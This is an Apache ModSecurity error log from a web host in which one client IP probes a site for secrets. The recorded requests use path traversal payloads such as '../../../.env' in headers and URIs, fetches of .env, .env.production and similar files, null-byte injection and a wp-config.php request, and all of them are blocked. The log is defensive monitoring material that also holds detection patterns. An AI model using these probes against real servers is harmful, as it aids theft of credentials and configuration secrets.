[Tue May 12 05:22:44.083547 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:19786] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdBNr1yOh9TvizezidsAAAAEM"]
[Tue May 12 05:22:44.083959 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:19786] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdBNr1yOh9TvizezidsAAAAEM"]
[Tue May 12 05:22:44.104403 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.238:19788] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdBAgpmE1yW0glLdgsXwAAANg"]
[Tue May 12 05:22:44.104509 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.238:19788] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdBAgpmE1yW0glLdgsXwAAANg"]
[Tue May 12 05:22:44.104635 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.238:19788] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdBAgpmE1yW0glLdgsXwAAANg"]
[Tue May 12 05:22:44.112460 2026] [security2:error] [pid 1842385:tid 1842400] [client 45.148.10.238:19802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdBBs7kySIUZ3ORnIkuwAAAQo"]
[Tue May 12 05:22:44.112633 2026] [security2:error] [pid 1842385:tid 1842400] [client 45.148.10.238:19802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdBBs7kySIUZ3ORnIkuwAAAQo"]
[Tue May 12 05:22:44.846009 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.238:54278] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc2RfeipD4uoG21FouwgAAAAA"]
[Tue May 12 05:22:46.308655 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.238:29646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc3QgpmE1yW0glLdgsNgAAAMw"]
[Tue May 12 05:22:47.153362 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.238:29878] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc5Nr1yOh9TvizezidkQAAAFI"]
[Tue May 12 05:22:47.174146 2026] [security2:error] [pid 1842385:tid 1842405] [client 45.148.10.238:22130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc7xs7kySIUZ3ORnIknwAAAQ8"]
[Tue May 12 05:22:47.204285 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:54242] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc2Rs7kySIUZ3ORnIkdwAAAQE"]
[Tue May 12 05:22:47.967317 2026] [security2:error] [pid 1842385:tid 1842395] [client 45.148.10.238:19832] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdBxs7kySIUZ3ORnIkvwAAAQU"]
[Tue May 12 05:22:47.967401 2026] [security2:error] [pid 1842385:tid 1842395] [client 45.148.10.238:19832] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdBxs7kySIUZ3ORnIkvwAAAQU"]
[Tue May 12 05:22:47.967593 2026] [security2:error] [pid 1842385:tid 1842395] [client 45.148.10.238:19832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdBxs7kySIUZ3ORnIkvwAAAQU"]
[Tue May 12 05:22:47.971490 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.238:19818] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdB81tk6y7yBJLpJo4MgAAAIw"]
[Tue May 12 05:22:47.971545 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.238:19818] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdB81tk6y7yBJLpJo4MgAAAIw"]
[Tue May 12 05:22:47.971574 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.238:19818] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdB81tk6y7yBJLpJo4MgAAAIw"]
[Tue May 12 05:22:47.971782 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.238:19818] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdB81tk6y7yBJLpJo4MgAAAIw"]
[Tue May 12 05:22:47.973099 2026] [security2:error] [pid 1825287:tid 1825316] [client 45.148.10.238:19836] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdBwgpmE1yW0glLdgsYwAAAMs"]
[Tue May 12 05:22:47.973306 2026] [security2:error] [pid 1825287:tid 1825316] [client 45.148.10.238:19836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdBwgpmE1yW0glLdgsYwAAAMs"]
[Tue May 12 05:22:47.979803 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.238:19818] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdB81tk6y7yBJLpJo4MgAAAIw"]
[Tue May 12 05:22:47.980483 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.238:19818] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdB81tk6y7yBJLpJo4MgAAAIw"]
[Tue May 12 05:22:48.733871 2026] [security2:error] [pid 1808852:tid 1808858] [client 45.148.10.238:29836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc5BfeipD4uoG21Fou1AAAAAM"]
[Tue May 12 05:22:50.592725 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.238:22062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc7M1tk6y7yBJLpJo4CgAAAIg"]
[Tue May 12 05:22:51.170963 2026] [access_compat:error] [pid 1842385:tid 1842399] [client 45.148.10.238:19852] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:22:51.185211 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.238:19866] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdC81tk6y7yBJLpJo4NgAAAJc"]
[Tue May 12 05:22:51.185277 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.238:19866] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdC81tk6y7yBJLpJo4NgAAAJc"]
[Tue May 12 05:22:51.185305 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.238:19866] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdC81tk6y7yBJLpJo4NgAAAJc"]
[Tue May 12 05:22:51.185900 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.238:19866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/health"] [unique_id "agKdC81tk6y7yBJLpJo4NgAAAJc"]
[Tue May 12 05:22:51.194753 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.238:19842] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdCwgpmE1yW0glLdgsZQAAAMw"]
[Tue May 12 05:22:51.194989 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.238:19842] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdCwgpmE1yW0glLdgsZQAAAMw"]
[Tue May 12 05:22:51.764176 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.238:19786] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdBNr1yOh9TvizezidsAAAAEM"]
[Tue May 12 05:22:53.187126 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.238:60902] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc9dr1yOh9TvizezidoAAAAEg"]
[Tue May 12 05:22:53.625526 2026] [security2:error] [pid 1820198:tid 1820217] [client 45.148.10.238:60832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc_M1tk6y7yBJLpJo4IQAAAJE"]
[Tue May 12 05:22:53.629037 2026] [authz_core:error] [pid 1820198:tid 1820211] [client 47.128.125.74:28006] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-bindings/error_log
[Tue May 12 05:22:54.333421 2026] [security2:error] [pid 1820198:tid 1820218] [client 45.148.10.238:29592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc281tk6y7yBJLpJo39QAAAJI"]
[Tue May 12 05:22:55.067820 2026] [security2:error] [pid 1820198:tid 1820212] [client 45.148.10.238:19818] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdB81tk6y7yBJLpJo4MgAAAIw"]
[Tue May 12 05:22:55.212234 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:33206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.staging"] [unique_id "agKdD9r1yOh9TvizezidwQAAAE0"]
[Tue May 12 05:22:55.212449 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:33206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.staging"] [unique_id "agKdD9r1yOh9TvizezidwQAAAE0"]
